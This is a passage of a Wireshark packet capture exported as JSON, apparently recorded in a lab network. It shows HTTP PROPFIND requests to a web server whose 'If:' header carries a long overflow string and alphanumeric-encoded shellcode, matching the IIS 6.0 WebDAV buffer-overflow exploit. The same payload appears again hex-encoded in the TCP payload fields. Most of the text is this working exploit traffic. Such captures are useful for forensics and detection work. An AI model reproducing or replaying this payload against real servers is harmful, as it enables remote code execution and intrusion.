51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/UXkMaFFhGixfUiceqdOWlDybSGMlNrLiEpmjjiuZjnacQFZpAjOvQJuYxcUfcMCcLLuOkvoYQUKAHwihLYzMnlppYbENluqmSkek<65><6B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/jDmGOcBQzRVhTOvUDsMRVthdCvtEVcRlzOzrdayWHyNlMQDMPanfFzHHGcLWRuhfNBUBVonFlbAfTdtBpgJsZyjGbCPaUIWgSzUl<55><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "233"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.524935000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.524935000",
|
||
"frame.time_delta": "0.000060000",
|
||
"frame.time_delta_displayed": "0.007636000",
|
||
"frame.time_relative": "16.775875000",
|
||
"frame.number": "242",
|
||
"frame.len": "327",
|
||
"frame.cap_len": "327",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "313",
|
||
"ip.id": "0x00000001",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00003057",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "39577",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "39577",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "45",
|
||
"tcp.len": "261",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "319923009",
|
||
"tcp.nxtseq": "1710",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3278188652",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00002298",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:2c:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:2c:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868332",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000599000",
|
||
"tcp.analysis.bytes_in_flight": "1709",
|
||
"tcp.analysis.push_bytes_sent": "1709"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000973000",
|
||
"tcp.time_delta": "0.000060000"
|
||
},
|
||
"tcp.payload": "47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "241",
|
||
"tcp.segment": "242",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1709",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:77:52:48:4f:5a:52:5a:46:56:4c:71:69:78:4f:66:78:67:6d:44:70:65:63:67:4b:48:6a:57:57:77:56:5a:46:73:57:74:71:69:6e:4b:41:49:46:50:77:4e:76:6c:71:42:64:4e:64:49:62:48:72:62:6b:65:61:55:46:61:44:69:6c:4d:5a:4c:4e:64:45:53:68:4c:55:79:45:53:63:65:68:43:66:50:6a:4f:4f:42:71:74:63:59:62:6d:50:71:61:44:e4:99:8d:e7:85:a9:e4:85:85:e5:81:98:e7:9d:88:e6:b1:a7:e4:bd:8f:e4:b9:a2:e4:91:81:e4:b1:a6:e5:89:93:e4:91:b5:e6:99:a8:e4:99:99:e4:95:90:e4:ad:a6:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:89:89:e7:91:8a:e7:8d:96:e7:8d:91:e5:a9:94:e4:91:8b:e5:95:ab:e4:a9:b8:e6:b9:81:e6:89:87:e4:a5:a1:e6:b5:98:e5:95:81:e6:95:a4:e6:bd:8d:e6:b1:b9:e6:85:b9:e7:85:96:e5:a1:a2:e4:ad:b8:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:51:62:6c:64:68:57:50:5a:53:59:49:59:71:45:4d:6b:74:4f:69:41:63:71:70:61:4e:6e:44:61:57:51:43:75:6c:63:77:4c:67:72:48:44:46:43:43:45:77:47:57:44:56:6a:62:59:64:47:43:42:53:49:4d:6a:69:57:46:49:62:4a:4b:41:59:6a:64:50:70:58:78:44:58:5a:4c:72:6f:6c:65:54:50:78:6d:58:73:73:46:6b:58:44:5a:6e:46:54:50:e5:a1:9a:e4:8d:86:e6:a1:b5:e7:8d:ab:e6:b9:b8:e5:91:af:e5:85:82:e7:99:a7:e7:85:82:e5:8d:93:e4:85:87:e4:bd:a9:e4:85:a9:e5:91:8f:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:a9:8b:e7:8d:a8:e7:a9:ae:e6:8d:b9:e1:8f:80:e6:a0:83:e7:91:b1:e6:89:b3:e7:85:a5:e4:95:8a:e7:89:b2:e4:99:a7:e4:a5:89:e7:a5:94:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
